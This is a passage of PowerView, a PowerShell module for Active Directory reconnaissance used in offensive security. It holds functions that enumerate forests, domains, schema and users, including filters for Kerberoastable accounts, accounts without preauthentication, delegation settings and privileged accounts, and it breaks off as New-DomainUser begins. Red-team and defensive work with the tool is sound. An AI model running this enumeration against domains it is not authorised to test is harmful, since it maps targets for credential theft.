+ +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target forest. + +.EXAMPLE + +Get-Forest -Forest external.domain + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Forest -Credential $Cred + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition +to the forest root domain SID. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + if ($PSBoundParameters['Credential']) { + + Write-Verbose "[Get-Forest] Using alternate credentials for Get-Forest" + + if ($PSBoundParameters['Forest']) { + $TargetForest = $Forest + } + else { + # if no domain is supplied, extract the logon domain from the PSCredential passed + $TargetForest = $Credential.GetNetworkCredential().Domain + Write-Verbose "[Get-Forest] Extracted domain '$Forest' from -Credential" + } + + $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password) + + try { + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + } + catch { + Write-Verbose "[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" + $Null + } + } + elseif ($PSBoundParameters['Forest']) { + 
$ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest) + try { + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + } + catch { + Write-Verbose "[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_" + return $Null + } + } + else { + # otherwise use the current forest + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() + } + + if ($ForestObject) { + # get the SID of the forest root + if ($PSBoundParameters['Credential']) { + $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid + } + else { + $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name).objectsid + } + + $Parts = $ForestSid -Split '-' + $ForestSid = $Parts[0..$($Parts.length-2)] -join '-' + $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid + $ForestObject + } + } +} + + +function Get-ForestDomain { +<# +.SYNOPSIS + +Return all domains for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +Returns all domains for the current forest or the forest specified +by -Forest X. + +.PARAMETER Forest + +Specifies the forest name to query for domains. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target forest. + +.EXAMPLE + +Get-ForestDomain + +.EXAMPLE + +Get-ForestDomain -Forest external.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestDomain -Credential $Cred + +.OUTPUTS + +System.DirectoryServices.ActiveDirectory.Domain +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.ActiveDirectory.Domain')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + if ($ForestObject) { + $ForestObject.Domains + } + } +} + + +function Get-ForestGlobalCatalog { +<# +.SYNOPSIS + +Return all global catalogs for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +Returns all global catalogs for the current forest or the forest specified +by -Forest X by using Get-Forest to retrieve the specified forest object +and the .FindAllGlobalCatalogs() to enumerate the global catalogs. + +.PARAMETER Forest + +Specifies the forest name to query for global catalogs. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-ForestGlobalCatalog + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestGlobalCatalog -Credential $Cred + +.OUTPUTS + +System.DirectoryServices.ActiveDirectory.GlobalCatalog +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + + if ($ForestObject) { + $ForestObject.FindAllGlobalCatalogs() + } + } +} + + +function Get-ForestSchemaClass { +<# +.SYNOPSIS + +Helper that returns the Active Directory schema classes for the current +(or specified) forest or returns just the schema class specified by +-ClassName X. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +Uses Get-Forest to retrieve the current (or specified) forest. By default, +the .FindAllClasses() method is executed, returning a collection of +[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results. +If "-FindClass X" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] +result for the specified class name is returned. + +.PARAMETER ClassName + +Specifies a ActiveDirectorySchemaClass name in the found schema to return. + +.PARAMETER Forest + +The forest to query for the schema, defaults to the current forest. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. 
+ +.EXAMPLE + +Get-ForestSchemaClass + +Returns all domain schema classes for the current forest. + +.EXAMPLE + +Get-ForestSchemaClass -Forest dev.testlab.local + +Returns all domain schema classes for the external.local forest. + +.EXAMPLE + +Get-ForestSchemaClass -ClassName user -Forest external.local + +Returns the user schema class for the external.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred + +Returns the user schema class for the external.local domain using +the specified alternate credentials. + +.OUTPUTS + +[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] + +An ActiveDirectorySchemaClass returned from the found schema. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [Alias('Class')] + [ValidateNotNullOrEmpty()] + [String[]] + $ClassName, + + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + + if ($ForestObject) { + if ($PSBoundParameters['ClassName']) { + ForEach ($TargetClass in $ClassName) { + $ForestObject.Schema.FindClass($TargetClass) + } + } + else { + $ForestObject.Schema.FindAllClasses() + } + } + } +} + + +function Find-DomainObjectPropertyOutlier { +<# +.SYNOPSIS + +Finds user/group/computer objects in AD that 
have 'outlier' properties set. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer + +.DESCRIPTION + +A 'reference' set of property names is calculated, either from a standard set preserved +for user/group/computers, or from the array of names passed to -ReferencePropertySet, or +from the property names of the passed -ReferenceObject. Every user/group/computer object +(depending on determined class) are enumerated, and for each object, if the object has a +'non-standard' property set (meaning a property not held by the reference set), the object's +samAccountName, property name, and property value are output to the pipeline. + +.PARAMETER ClassName + +Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'. +If -ReferenceObject is specified, this will be automatically extracted, if possible. + +.PARAMETER ReferencePropertySet + +Specifies an array of property names to diff against the class schema. + +.PARAMETER ReferenceObject + +Specicifes the PowerView user/group/computer object to extract property names +from to use as the reference set. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 
+ +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Find-DomainObjectPropertyOutlier -ClassName 'User' + +Enumerates users in the current domain with 'outlier' properties filled in. + +.EXAMPLE + +Find-DomainObjectPropertyOutlier -ClassName 'Group' -Domain external.local + +Enumerates groups in the external.local forest/domain with 'outlier' properties filled in. + +.EXAMPLE + +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier + +Enumerates computers in the current domain with 'outlier' properties filled in. + +.OUTPUTS + +PowerView.PropertyOutlier + +Custom PSObject with translated object property outliers. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.PropertyOutlier')] + [CmdletBinding(DefaultParameterSetName = 'ClassName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')] + [Alias('Class')] + [ValidateSet('User', 'Group', 'Computer')] + [String] + $ClassName, + + [ValidateNotNullOrEmpty()] + [String[]] + $ReferencePropertySet, + + [Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')] + [PSCustomObject] + $ReferenceObject, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + 
[Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated') + + $GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated') + + $ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated') + + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if 
($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + # Domain / Credential + if ($PSBoundParameters['Domain']) { + if ($PSBoundParameters['Credential']) { + $TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name + } + else { + $TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name + } + Write-Verbose "[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'" + } + + $SchemaArguments = @{} + if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential } + if ($TargetForest) { + $SchemaArguments['Forest'] = $TargetForest + } + } + + PROCESS { + + if ($PSBoundParameters['ReferencePropertySet']) { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet" + $ReferenceObjectProperties = $ReferencePropertySet + } + elseif ($PSBoundParameters['ReferenceObject']) { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set" + $ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name + $ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1 + Write-Verbose "[Find-DomainObjectPropertyOutlier] Calculated ReferenceObjectClass : $ReferenceObjectClass" + } + else { + 
Write-Verbose "[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'" + } + + if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) { + $Objects = Get-DomainUser @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $UserReferencePropertySet + } + } + elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) { + $Objects = Get-DomainGroup @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $GroupReferencePropertySet + } + } + elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) { + $Objects = Get-DomainComputer @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $ComputerReferencePropertySet + } + } + else { + throw "[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName" + } + + ForEach ($Object in $Objects) { + $ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name + ForEach($ObjectProperty in $ObjectProperties) { + if ($ReferenceObjectProperties -NotContains $ObjectProperty) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName + $Out | Add-Member Noteproperty 'Property' $ObjectProperty + $Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty + $Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier') + $Out + } + } + } + } +} + + +######################################################## +# +# "net *" replacements and other fun start below +# +######################################################## + +function Get-DomainUser { +<# +.SYNOPSIS + +Return all users or specific user objects in AD. 
+ +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all user objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. Also accepts DOMAIN\user format. + +.PARAMETER SPN + +Switch. Only return user objects with non-null service principal names. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER AdminCount + +Switch. Return users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER AllowDelegation + +Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' + +.PARAMETER DisallowDelegation + +Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation' + +.PARAMETER TrustedToAuth + +Switch. Return computer objects that are trusted to authenticate for other principals. + +.PARAMETER PreauthNotRequired + +Switch. Return user accounts with "Do not require Kerberos preauthentication" set. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. 
+ +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainUser -Domain testlab.local + +Return all users for the testlab.local domain + +.EXAMPLE + +Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator" + +Return the user with the given SID, as well as Administrator. 
+ +.EXAMPLE + +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff + +lastlogoff samaccountname +---------- -------------- +12/31/1600 4:00:00 PM dfm.a +12/31/1600 4:00:00 PM dfm +12/31/1600 4:00:00 PM harmj0y +12/31/1600 4:00:00 PM Administrator + +.EXAMPLE + +Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation + +Search the specified OU for privileged user (AdminCount = 1) that allow delegation + +.EXAMPLE + +Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon + +Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon + +.EXAMPLE + +Get-DomainUser -UACFilter DONT_REQ_PREAUTH,NOT_PASSWORD_EXPIRED + +Find users who doesn't require Kerberos preauthentication and DON'T have an expired password. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +Get-DomainUser dev\user1 -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1))) + +distinguishedname +----------------- +CN=user1,CN=Users,DC=dev,DC=testlab,DC=local + +.INPUTS + +String + +.OUTPUTS + +PowerView.User + +Custom PSObject with translated user property fields. + +PowerView.User.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.User')] + [OutputType('PowerView.User.Raw')] + [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [Switch] + $SPN, + + [Switch] + $AdminCount, + + [Parameter(ParameterSetName = 'AllowDelegation')] + [Switch] + $AllowDelegation, + + [Parameter(ParameterSetName = 'DisallowDelegation')] + [Switch] + $DisallowDelegation, + + [Switch] + $TrustedToAuth, + + [Alias('KerberosPreauthNotRequired', 'NoPreauth')] + [Switch] + $PreauthNotRequired, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter 
-Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $UserSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + + if ($UserSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' 
-replace ',','.' + Write-Verbose "[Get-DomainUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $UserSearcher = Get-DomainSearcher @SearcherArguments + if (-not $UserSearcher) { + Write-Warning "[Get-DomainUser] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $UserName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$UserName)" + $SearcherArguments['Domain'] = $UserDomain + Write-Verbose "[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'" + $UserSearcher = Get-DomainSearcher @SearcherArguments + } + } + else { + $IdentityFilter += "(samAccountName=$IdentityInstance)" + } + } + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['SPN']) { + Write-Verbose '[Get-DomainUser] Searching for non-null service principal names' + $Filter += '(servicePrincipalName=*)' + } + if ($PSBoundParameters['AllowDelegation']) { + Write-Verbose '[Get-DomainUser] Searching for users who can be delegated' + # negation of "Accounts that are sensitive and not trusted for delegation" + $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))' + } + if ($PSBoundParameters['DisallowDelegation']) { + Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation' + $Filter += 
'(userAccountControl:1.2.840.113556.1.4.803:=1048574)' + } + if ($PSBoundParameters['AdminCount']) { + Write-Verbose '[Get-DomainUser] Searching for adminCount=1' + $Filter += '(admincount=1)' + } + if ($PSBoundParameters['TrustedToAuth']) { + Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals' + $Filter += '(msds-allowedtodelegateto=*)' + } + if ($PSBoundParameters['PreauthNotRequired']) { + Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainUser] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)" + Write-Verbose "[Get-DomainUser] filter string: $($UserSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() } + else { $Results = $UserSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $User = $_ + $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw') + } + else { + $User = Convert-LDAPProperty -Properties $_.Properties + $User.PSObject.TypeNames.Insert(0, 'PowerView.User') + } + $User + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainUser] Error disposing of the Results object: $_" + } + } + $UserSearcher.dispose() + } + } +} + + +function New-DomainUser { +<# 
